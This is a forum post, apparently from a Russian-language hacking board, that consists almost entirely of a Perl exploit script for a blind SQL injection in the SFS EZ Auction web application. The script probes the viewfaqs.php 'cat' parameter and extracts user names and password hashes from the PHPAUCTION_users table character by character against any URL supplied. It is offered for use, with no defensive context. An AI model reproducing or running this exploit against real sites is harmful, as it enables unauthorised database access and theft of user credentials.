SFS Auction Blind sql injection Exploit
Вложений: 1
SFS Auction Blind sql injection Exploit
Код:
#!/usr/bin/perl -w
use strict;
use LWP::Simple;
$| = 1;
print q {
:::::::::::::::::::::::::::::::::::::::::::::::::::
:: SFS EZ Auction Blind sql injection exploit ::
:: written by Dimi4 ::
:::::::::::::::::::::::::::::::::::::::::::::::::::
[~] Greetz:
[~] UASC uasc.org.ua
[~] ANTICHAT forum.antichat.ru
};
if (@ARGV < 1) {
print "Usage: perl exploit.pl [url] \nExample: perl exploit.pl www.target.com/demo\n";
exit;
}
my $page = shift;
my $uid = shift;
my $prefix;
my @charset = ('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9',':');
print "[x] Vulnerability check...\n";
my $chreq = get("http://".$page."/viewfaqs.php?cat=1+and+1=0");
if (($chreq =~ m/DWarning/i) || ($chreq =~ m/mysql_result()/i)) {
print "[x] Seems to be vulnerable!\n";
} else {
print "[o] Seems to be patched, sorry\n";
exit;
}
print "[+] Getting hash...\n";
print "[+] Hash: ";
my $curnum = 1;
while($curnum < 62) {
my $false_result = get("http://".$page."/viewfaqs.php?cat=1+and+1=1+and+ascii(substring(version(),".$curnum.",1))=-1");
foreach(@charset) {
my $ascode = ord($_);
my $result = get("http://".$page."/viewfaqs.php?cat=1+and+1=1+and+ascii(substring((SELECT+concat_ws(0x3a,name,password)+from+PHPAUCTION_users),".$curnum.",1))=".$ascode);
if (length($result) != 0) {
if (length($result) != length($false_result)) {
print chr($ascode);
$curnum++;
}
}
}
}
print "\n[+] Done!\n";
|
